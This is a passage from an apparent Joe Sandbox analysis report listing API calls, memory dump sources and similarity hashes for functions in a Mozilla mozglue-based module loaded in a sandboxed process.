                                                                                                                                                        • free.MOZGLUE(?,6B0F008B), ref: 6B077BAC
                                                                                                                                                          • Part of subcall function 6B0778C0: free.MOZGLUE(?,6B0F008B), ref: 6B077BCF
                                                                                                                                                        • free.MOZGLUE(?,6B0F008B), ref: 6B077BF2
                                                                                                                                                          • Part of subcall function 6B095E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6B095EDB
                                                                                                                                                          • Part of subcall function 6B095E90: memset.VCRUNTIME140(ewk,000000E5,?), ref: 6B095F27
                                                                                                                                                          • Part of subcall function 6B095E90: LeaveCriticalSection.KERNEL32(?), ref: 6B095FB2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$CriticalSection$EnterLeavememset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3977402767-0
                                                                                                                                                        • Opcode ID: de13096f30fd9cd7c24488829bfc26b80d88861ff97f1a05bc85c23831600c27
                                                                                                                                                        • Instruction ID: d28cfd679e77c0e3b6dc7f746cb1056e49d27dff7cd5197460f3e72a09e426ec
                                                                                                                                                        • Opcode Fuzzy Hash: de13096f30fd9cd7c24488829bfc26b80d88861ff97f1a05bc85c23831600c27
                                                                                                                                                        • Instruction Fuzzy Hash: 7CC1AF71E011288BEB3CAB28CC90B9DFB72EF45354F1006F9D51AAB381D7399E848B55
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0C124B
                                                                                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6B0C1268
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0C12DA
                                                                                                                                                        • InitializeConditionVariable.KERNEL32(?), ref: 6B0C134A
                                                                                                                                                        • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6B0C138A
                                                                                                                                                        • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6B0C1431
                                                                                                                                                          • Part of subcall function 6B0B8AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6B0D1563), ref: 6B0B8BD5
                                                                                                                                                        • free.MOZGLUE(?), ref: 6B0C145A
                                                                                                                                                        • free.MOZGLUE(?), ref: 6B0C146C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2803333873-0
                                                                                                                                                        • Opcode ID: b80fd647d54fb5d324f65079096efe1c340e97f575fb3654596546864ec3abf6
                                                                                                                                                        • Instruction ID: a0bf75bd810656a8f55abada55a98205f685f216534762c23d611182ec3cec64
                                                                                                                                                        • Opcode Fuzzy Hash: b80fd647d54fb5d324f65079096efe1c340e97f575fb3654596546864ec3abf6
                                                                                                                                                        • Instruction Fuzzy Hash: AB61BE75A043049BDB18DF24D880B9FBBE6BFC5308F00895DE99957212EB39E495CB42
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • free.MOZGLUE(?,?,?,6B074667,?,?,?,?,?,?,?,?,6B0B4843,?), ref: 6B074C63
                                                                                                                                                        • free.MOZGLUE(?,?,?,6B074667,?,?,?,?,?,?,?,?,6B0B4843,?), ref: 6B074C89
                                                                                                                                                        • free.MOZGLUE(?,?,?,6B074667,?,?,?,?,?,?,?,?,6B0B4843,?), ref: 6B074CAC
                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,6B0B4843,?), ref: 6B074CCF
                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,6B0B4843,?), ref: 6B074CF2
                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,6B0B4843,?), ref: 6B074D15
                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,6B0B4843,?), ref: 6B074D38
                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6B074667,?,?,?,?,?,?,?,?,6B0B4843,?), ref: 6B074DD1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$_invalid_parameter_noinfo_noreturn
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1497960986-0
                                                                                                                                                        • Opcode ID: 9085cd2112742312f40b283f34349dbc68bd1e17c428f13fc6c528b83468a7e8
                                                                                                                                                        • Instruction ID: d1806dd078e97f795c9051b2a6ea5ca46611db64178f30620f22e211b98b999f
                                                                                                                                                        • Opcode Fuzzy Hash: 9085cd2112742312f40b283f34349dbc68bd1e17c428f13fc6c528b83468a7e8
                                                                                                                                                        • Instruction Fuzzy Hash: 02516971504A409FE33CAA3CD96875EFFA2AF01724F404A2DE197C7BD1D339A8448B45
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • moz_xmalloc.MOZGLUE(?,?,?,6B081999), ref: 6B07EA39
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,7FFFFFFE), ref: 6B07EA5C
                                                                                                                                                        • memset.VCRUNTIME140(7FFFFFFE,00000000,?), ref: 6B07EA76
                                                                                                                                                        • moz_xmalloc.MOZGLUE(-00000001,?,?,6B081999), ref: 6B07EA9D
                                                                                                                                                        • memcpy.VCRUNTIME140(?,7FFFFFFE,?,?,?,6B081999), ref: 6B07EAC2
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000000,?,?,?,?), ref: 6B07EADC
                                                                                                                                                        • free.MOZGLUE(7FFFFFFE,?,?,?,?), ref: 6B07EB0B
                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 6B07EB27
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpymemsetmoz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 706364981-0
                                                                                                                                                        • Opcode ID: 797ff789b07874307b4cb8efb5dc0f3d47686a341d1ea642fb5090a23ddb666b
                                                                                                                                                        • Instruction ID: f72b6eca6cfe532a7edc0be5d667725bb30cce2f24ce126ed3d103fc74f280ca
                                                                                                                                                        • Opcode Fuzzy Hash: 797ff789b07874307b4cb8efb5dc0f3d47686a341d1ea642fb5090a23ddb666b
                                                                                                                                                        • Instruction Fuzzy Hash: 9141E3B1A00215EFDB28DF68DC81BAEBFB9BF44214F140678E815D7394E735EA0087A5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6B0CD36B
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0CD38A
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6B0CD39D
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6B0CD3E1
                                                                                                                                                        • free.MOZGLUE ref: 6B0CD408
                                                                                                                                                          • Part of subcall function 6B0ACBE8: GetCurrentProcess.KERNEL32(?,6B0731A7), ref: 6B0ACBF1
                                                                                                                                                          • Part of subcall function 6B0ACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6B0731A7), ref: 6B0ACBFA
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0CD44B
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6B0CD457
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?), ref: 6B0CD472
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExclusiveLock$Current$AcquireProcessReleaseThread$StampTerminateTimeV01@@Value@mozilla@@free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3843575911-0
                                                                                                                                                        • Opcode ID: b047b428fb3ffc33224de34135d0cb9d87791231ba3f9ddcce50a4bdbd667d07
                                                                                                                                                        • Instruction ID: 2664e65270ac0a56a37df6f3877351dd063b9df72a0cd40833e65209ddfc9541
                                                                                                                                                        • Opcode Fuzzy Hash: b047b428fb3ffc33224de34135d0cb9d87791231ba3f9ddcce50a4bdbd667d07
                                                                                                                                                        • Instruction Fuzzy Hash: 354188756043059FCB18DF64D488B9FBFE9BF85314F104A2AEA5287240EB39E945CB92
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • moz_xmalloc.MOZGLUE(6B0F5104), ref: 6B07EFAC
                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6B07EFD7
                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,?,?), ref: 6B07EFEC
                                                                                                                                                        • free.MOZGLUE(?), ref: 6B07F00C
                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6B07F02E
                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,?), ref: 6B07F041
                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6B07F065
                                                                                                                                                        • moz_xmalloc.MOZGLUE ref: 6B07F072
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1148890222-0
                                                                                                                                                        • Opcode ID: 3ae31dde828bb0c1bf40b7b5687846453a81be641bc3d11aa5316e33c23b5273
                                                                                                                                                        • Instruction ID: 7d82b8d93bfbfe48b921d7c8af174c288fb92f34f4d64bff2f76349c46dfafe6
                                                                                                                                                        • Opcode Fuzzy Hash: 3ae31dde828bb0c1bf40b7b5687846453a81be641bc3d11aa5316e33c23b5273
                                                                                                                                                        • Instruction Fuzzy Hash: F641EBB1A001059FCB1CDF78D8816AE7B69BF84314B244278E815D7394EB35D911C7E5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • free.MOZGLUE(?,?,?,6B0D7ABE), ref: 6B08985B
                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6B0D7ABE), ref: 6B0898A8
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000020), ref: 6B089909
                                                                                                                                                        • memcpy.VCRUNTIME140(00000023,?,?), ref: 6B089918
                                                                                                                                                        • free.MOZGLUE(?), ref: 6B089975
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$_invalid_parameter_noinfo_noreturnmemcpymoz_xmalloc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1281542009-0
                                                                                                                                                        • Opcode ID: a6fe565b9f6840b78b9573892a5fa3cfa17f171f9f0a0357ff41ef8b8542ccfb
                                                                                                                                                        • Instruction ID: 2cb923bacfe08206ed1ac811cff4a222f820e7cee685bbd27b1d2fa86e04558c
                                                                                                                                                        • Opcode Fuzzy Hash: a6fe565b9f6840b78b9573892a5fa3cfa17f171f9f0a0357ff41ef8b8542ccfb
                                                                                                                                                        • Instruction Fuzzy Hash: D4719B74600706CFCB29DF28D480A56BBF1FF4A324B505AADD89A8B791D735F901CB90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6B0B4AB7,?,6B0743CF,?,6B0742D2), ref: 6B0B4B48
                                                                                                                                                        • free.MOZGLUE(?,?,?,80000000,?,6B0B4AB7,?,6B0743CF,?,6B0742D2), ref: 6B0B4B7F
                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6B0B4AB7,?,6B0743CF,?,6B0742D2), ref: 6B0B4B94
                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6B0B4AB7,?,6B0743CF,?,6B0742D2), ref: 6B0B4BBC
                                                                                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,pid:,00000004,?,?,?,6B0B4AB7,?,6B0743CF,?,6B0742D2), ref: 6B0B4BEE
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy$_invalid_parameter_noinfo_noreturnfreestrncmp
                                                                                                                                                        • String ID: pid:
                                                                                                                                                        • API String ID: 1916652239-3403741246
                                                                                                                                                        • Opcode ID: 294dcc7f608fa5c95f1f35e6d495fbf00c9fe710b67f1fe72eaaa57ad2c69914
                                                                                                                                                        • Instruction ID: 925f77ac377aac0fb31eca05e0b8fec5f54b72b665f4d7d3fc2f023c339d2149
                                                                                                                                                        • Opcode Fuzzy Hash: 294dcc7f608fa5c95f1f35e6d495fbf00c9fe710b67f1fe72eaaa57ad2c69914
                                                                                                                                                        • Instruction Fuzzy Hash: 3041E871700255ABCB18CFB8EC80A9FBFE9EF85324B144638E969D7381D6359A0487A1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6B0FE220,?), ref: 6B0DBC2D
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6B0FE220), ref: 6B0DBC42
                                                                                                                                                        • RtlFreeHeap.NTDLL(?,00000000,6B0EE300), ref: 6B0DBC82
                                                                                                                                                        • RtlFreeUnicodeString.NTDLL(6B0FE210), ref: 6B0DBC91
                                                                                                                                                        • RtlFreeUnicodeString.NTDLL(6B0FE208), ref: 6B0DBCA3
                                                                                                                                                        • RtlFreeHeap.NTDLL(?,00000000,6B0FE21C), ref: 6B0DBCD2
                                                                                                                                                        • free.MOZGLUE(?), ref: 6B0DBCD8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3047341122-0
                                                                                                                                                        • Opcode ID: 94276c0833c427aa3228c2dddd44d14de75fa4e4719fc78576caae2079a12e12
                                                                                                                                                        • Instruction ID: c551d672195bcf4a0ab1d5ff08376bfb45128e1e9c31adea6b3624bfa39b6961
                                                                                                                                                        • Opcode Fuzzy Hash: 94276c0833c427aa3228c2dddd44d14de75fa4e4719fc78576caae2079a12e12
                                                                                                                                                        • Instruction Fuzzy Hash: 9F212872600304CFE7248F16D880B66BFE9FF45754F8584ADE91A5B690CB39F842CBA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6B0FE220,?,?,?,?,6B083899,?), ref: 6B0838B2
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6B0FE220,?,?,?,6B083899,?), ref: 6B0838C3
                                                                                                                                                        • free.MOZGLUE(00000000,?,?,?,6B083899,?), ref: 6B0838F1
                                                                                                                                                        • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6B083920
                                                                                                                                                        • RtlFreeUnicodeString.NTDLL(-0000000C,?,?,?,6B083899,?), ref: 6B08392F
                                                                                                                                                        • RtlFreeUnicodeString.NTDLL(-00000014,?,?,?,6B083899,?), ref: 6B083943
                                                                                                                                                        • RtlFreeHeap.NTDLL(?,00000000,0000002C), ref: 6B08396E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3047341122-0
                                                                                                                                                        • Opcode ID: e8bff4e302797c5b7ce286cd945ee25e121b51a0a875293f4c938a3e3759cbc0
                                                                                                                                                        • Instruction ID: 236de90a276bd4dc72a3db7f22dcc55b14c9dd35dc7e32351ded885a1e37fdaf
                                                                                                                                                        • Opcode Fuzzy Hash: e8bff4e302797c5b7ce286cd945ee25e121b51a0a875293f4c938a3e3759cbc0
                                                                                                                                                        • Instruction Fuzzy Hash: 5F21E172600710DFDB24CF25D880B46BFE9EF89324F118469E95A97210CB39E941CB91
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,6B0956EE,?,00000001), ref: 6B095B85
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6B0FF688,?,?,?,6B0956EE,?,00000001), ref: 6B095B90
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6B0FF688,?,?,?,6B0956EE,?,00000001), ref: 6B095BD8
                                                                                                                                                        • GetTickCount64.KERNEL32 ref: 6B095BE4
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$Count64CounterEnterLeavePerformanceQueryTick
                                                                                                                                                        • String ID: Vk$Vk
                                                                                                                                                        • API String ID: 2796706680-1126992279
                                                                                                                                                        • Opcode ID: 80fcb1411f2ea0f10f34f312706795ff5b0947404e5d09ce78836053ec614283
                                                                                                                                                        • Instruction ID: a298b627de680807a8e62dd05f2089f9bcf65fe36aec3652841b20ae81a14de0
                                                                                                                                                        • Opcode Fuzzy Hash: 80fcb1411f2ea0f10f34f312706795ff5b0947404e5d09ce78836053ec614283
                                                                                                                                                        • Instruction Fuzzy Hash: 86216D757057049FCB08DF69E45565ABFEEEF8A610F04C92EE99A87390DB34E804CB41
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0CD1EC
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6B0CD1F5
                                                                                                                                                          • Part of subcall function 6B0CAD40: moz_malloc_usable_size.MOZGLUE(?), ref: 6B0CAE20
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6B0CD211
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0CD217
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6B0CD226
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6B0CD279
                                                                                                                                                        • free.MOZGLUE(?), ref: 6B0CD2B2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThread$freemoz_malloc_usable_size
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3049780610-0
                                                                                                                                                        • Opcode ID: 624ea1ee37dd631c22a3ff731f49789ee7665dc81080293323ff7be259bb26c2
                                                                                                                                                        • Instruction ID: a02baf920f9587fa69be09d903f75284ad0fb6e2b997a66a7ed5941311e89c8e
                                                                                                                                                        • Opcode Fuzzy Hash: 624ea1ee37dd631c22a3ff731f49789ee7665dc81080293323ff7be259bb26c2
                                                                                                                                                        • Instruction Fuzzy Hash: 24215E75604705EFCB08DF64D488A9EBFA5FF8A324F10462EE91A87340DB35E905CB96
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6B0AAB89: EnterCriticalSection.KERNEL32(6B0FE370,?,?,?,6B0734DE,6B0FF6CC,?,?,?,?,?,?,?,6B073284), ref: 6B0AAB94
